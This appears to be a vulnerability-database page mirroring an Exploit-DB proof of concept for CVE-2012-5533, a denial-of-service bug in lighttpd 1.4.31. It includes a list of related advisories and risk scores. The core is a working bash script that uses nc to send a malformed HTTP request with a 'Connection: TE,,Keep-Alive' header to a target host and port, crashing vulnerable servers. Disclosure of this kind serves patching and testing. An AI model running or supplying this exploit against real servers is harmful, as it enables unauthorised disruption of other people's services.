lighttpd 1.4.31 - Denial of Service (PoC)

🗓️ 22 Nov 2012 00:00:00Reported by t4cType

exploitdb🔗 www.exploit-db.com👁 204 Views

Lighttpd 1.4.31 Denial of Service Proof of Concep

Reporter	Title	Published	Views	Family All 39
0day.today	lighttpd 1.4.31 Denial of Service PoC	21 Nov 201200:00	–	zdt
FreeBSD	lighttpd -- remote DoS in header parsing	17 Nov 201200:00	–	freebsd
Amazon	Medium: lighttpd	11 Apr 201300:00	–	amazon
Tenable Nessus	Amazon Linux AMI : lighttpd (ALAS-2013-179)	4 Sep 201300:00	–	nessus
Tenable Nessus	Fedora 18 : lighttpd-1.4.32-1.fc18 (2013-15344)	4 Sep 201300:00	–	nessus
Tenable Nessus	Fedora 19 : lighttpd-1.4.32-1.fc19 (2013-15345)	4 Sep 201300:00	–	nessus
Tenable Nessus	FreeBSD : lighttpd -- remote DoS in header parsing (1cd3ca42-33e6-11e2-a255-5404a67eef98)	23 Nov 201200:00	–	nessus
Tenable Nessus	GLSA-201406-10 : lighttpd: Multiple vulnerabilities	16 Jun 201400:00	–	nessus
Tenable Nessus	lighttpd 1.4.31 http_request_split_value Function Header Handling DoS	29 Nov 201200:00	–	nessus
Tenable Nessus	Mandriva Linux Security Advisory : lighttpd (MDVSA-2013:100)	20 Apr 201300:00	–	nessus

#!/bin/bash
# Exploit Title: simple lighttpd 1.4.31 DOS POC
# Date: 11/21/2012
# Exploit Author: [email protected]
# Vendor Homepage: http://www.lighttpd.net
# Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz 
# Version: 1.4.31
# Tested on: Debian Linux, Gentoo Linux, Arch Linux
# CVE: CVE-2012-5533

if [ $# -lt 2 ]
then
	echo "usage :$0 <Host/IP> <Port>"
else
	echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n" | nc $1 $2
fi

22 Nov 2012 00:00Current

7High risk

Vulners AI Score7

CVSS 25

EPSS0.37913